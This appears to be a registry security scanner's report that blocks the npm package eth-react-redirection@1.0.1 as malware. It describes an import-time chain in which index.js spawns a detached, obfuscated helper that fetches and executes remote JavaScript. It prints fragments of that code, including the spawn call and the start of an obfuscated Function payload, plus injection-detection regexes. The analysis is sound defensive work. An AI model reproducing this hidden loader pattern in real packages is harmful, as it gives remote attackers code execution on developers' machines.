Blocked & quarantined
Remote operator can run arbitrary Node.js code in the importing user's environment.
registry /
eth-react-redirection / 1.0.1
eth-react-redirection@1.0.1 A lightweight React library for **declarative and programmatic navigation** with support for redirects, route guards, authentication flows, and conditional navigation.
AI Security Reviewscanned 1h ago · by lpm-firewall-ai Importing the package launches a detached hidden helper. The helper contacts an obfuscated remote endpoint and can execute JavaScript returned by that server.
Static reason
One or more suspicious static signals were detected.; source matched previously finalized malicious package; routed for review
Trigger
Any runtime import of the `index.js` entrypoint.
Impact
Remote operator can run arbitrary Node.js code in the importing user's environment.
Mechanism
Detached remote payload retrieval and dynamic code execution.
Attack narrative
On import, `index.js` silently detaches a Node process running `lib/caller.js`. That helper is obfuscated and duplicated as `lib/config.js`; its visible equivalent payload in `lib/levels.js` fetches a URL assembled from hidden configuration using a hidden authorization value. If the response is a 404 containing `data.token`, it passes that server-controlled string to `Function.constructor` with `require`, enabling arbitrary code execution outside the package's stated functionality.
Rationale
This is a concrete import-time remote-code-execution chain, not merely suspicious primitives. The hidden endpoint and token obfuscation, detached execution, and unrelated exported functionality indicate malicious intent.
Evidence
package.json index.js lib/caller.js lib/config.js lib/levels.js
Decision evidencepublic snapshot AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
`index.js` immediately spawns `lib/caller.js` detached when imported. `lib/caller.js` is 67 KB obfuscated code using `Function(...)` dynamic evaluation. `lib/caller.js` loads Axios and hidden values from `./config`. `lib/levels.js` shows the payload logic: Axios GET with a hidden bearer-like token. On HTTP 404, `lib/levels.js` executes server-provided `error.response.data.token` via `Function.constructor`. `lib/config.js` is byte-identical to the obfuscated `lib/caller.js`, concealing the endpoint and credentials. Evidence against
`package.json` has no npm lifecycle hook. No package-local file write, deletion, or AI-agent configuration mutation was found. Behavioral surface
Source ChildProcess EnvironmentVars Eval Network
Supply chain HighEntropyStrings Minified UrlStrings
Manifest No manifest risk signals triggered.
scanned 18 file(s), 189 KB of source, external domains: github.com
Source & flagged code4 flagged · loading source 3 const path = require('path');
L4: const { spawn } = require('child_process');
L5:
3 Cross-file remote execution chain: index.js spawns lib/caller.js; helper contains network access plus dynamic code execution.
L3: const path = require('path');
L4: const { spawn } = require('child_process');
L5:
...
L7: function callCallerAsOrigin() {
L8: const script = path.resolve(__dirname, 'lib/caller.js');
L9: const child = spawn(process.execPath, [script], {
...
L62: const [headerRaw, payloadRaw] = parts;
L63: const header = JSON.parse(Buffer.from(headerRaw, 'base64url').toString('utf8'));
L64: const payload = JSON.parse(Buffer.from(payloadRaw, 'base64url').toString('utf8'));
High Cross File Remote Execution Context
Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.
index.js View on unpkg · L3 • matchType = normalized_sha256
matchedPackage = chai-redirection@0.0.3
matchedPath = index.js
matchedIdentity = npm:Y2hhaS1yZWRpcmVjdGlvbg:0.0.3
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High Known Malware Source Similarity
Source file is highly similar to a previously finalized malicious package; route for source-aware review.
index.js View on unpkg 1 Function("H9rYmof","\"use strict\";var TX36dv,hhEo8ZP,Nv98JYv,ZozhKIV,vwcMVI,QPfGur,p2j9ZJv,r45jV9,umfG5xY,H2yaHS,CHCAsu;const _NWYTkD=[0xc0,0x0,0x1,0x43,0x82,0x96,\"i\",\"g\",0xca...
Findings4 High 2 Medium 3 Low
High Child Process index.js
High Eval lib/caller.js
High Cross File Remote Execution Context index.js
High Known Malware Source Similarity index.js
Medium Network
Medium Environment Vars
Low Scripts Present
Low High Entropy Strings
Low Url Strings
Source & flagged code4 flagged Lines 1-23 javascript
3 const path = require ( 'path' );
4 const { spawn } = require ( 'child_process' );
7 function callCallerAsOrigin () {
8 const script = path. resolve (__dirname, 'lib/caller.js' );
9 const child = spawn (process.execPath, [script], {
High Cross File Remote Execution Context
Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.
index.js View on unpkg · L3 18 const JWT_SEGMENTS = 3 ;
20 / \b (select | insert | update | delete | drop | union | or \s + 1=1 | sleep \( | benchmark \( | -- | \/\* | \*\/ ) \b / i ;
22 /< \s * script | javascript: | onerror \s * = | onload \s * = | < \s * iframe | < \s * img [ ^ >] + on \w + \s * =/ i ;
23 const CONTROL_CHARS_PATTERN = / [\u0000-\u001f\u007f] / ;
• matchType = normalized_sha256
matchedPackage = chai-redirection@0.0.3
matchedPath = index.js
matchedIdentity = npm:Y2hhaS1yZWRpcmVjdGlvbg:0.0.3
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High Known Malware Source Similarity
Source file is highly similar to a previously finalized malicious package; route for source-aware review.
index.js View on unpkg Lines 1-1 javascript
1 Function ( "H9rYmof" , " \" use strict \" ;var TX36dv,hhEo8ZP,Nv98JYv,ZozhKIV,vwcMVI,QPfGur,p2j9ZJv,r45jV9,umfG5xY,H2yaHS,CHCAsu;const _NWYTkD=[0xc0,0x0,0x1,0x43,0x82,0x96, \" i \" , \" g \" ,0xca,0x6,0x9a,0x8,0xff, \" length \" , \" f \" ,0x3f, \" fromCodePoint \" ,0x7,0xc, \" push \" , \" d \" , \" undefined \"
,0x5b,0x1fff,0x58,0xd,0xe,
\"
slice
\"
,
\"
b
\"
,0x76,
\"
a
\"
,0x9,0x1d,0x2,0x37,0x53,0x5,
\"
h
\"
,
\"
e
\"
,0x3,0x5f,0x4,0xd1,0xb,0x3c,
\"
j
\"
,0xe3,
\"
c
\"
,0x2e,0x7c,0x4b,0x50,0x99,0x60,0x4f,0x20,0x1a,0x10,0x505,
\"
G
\"
,
\"
K
\"
,0x200,0x14,void 0x0,0xf,0xa,0x94,0xbb,0xd3,0x61,0xdb,0x56,0x3d,0xcf,0xef,0x32,0xdd,0x73,0x5cc,0xdf,0x90,0x3ff,0x7f,0x5ef, ..
.
Long lines were clipped for display.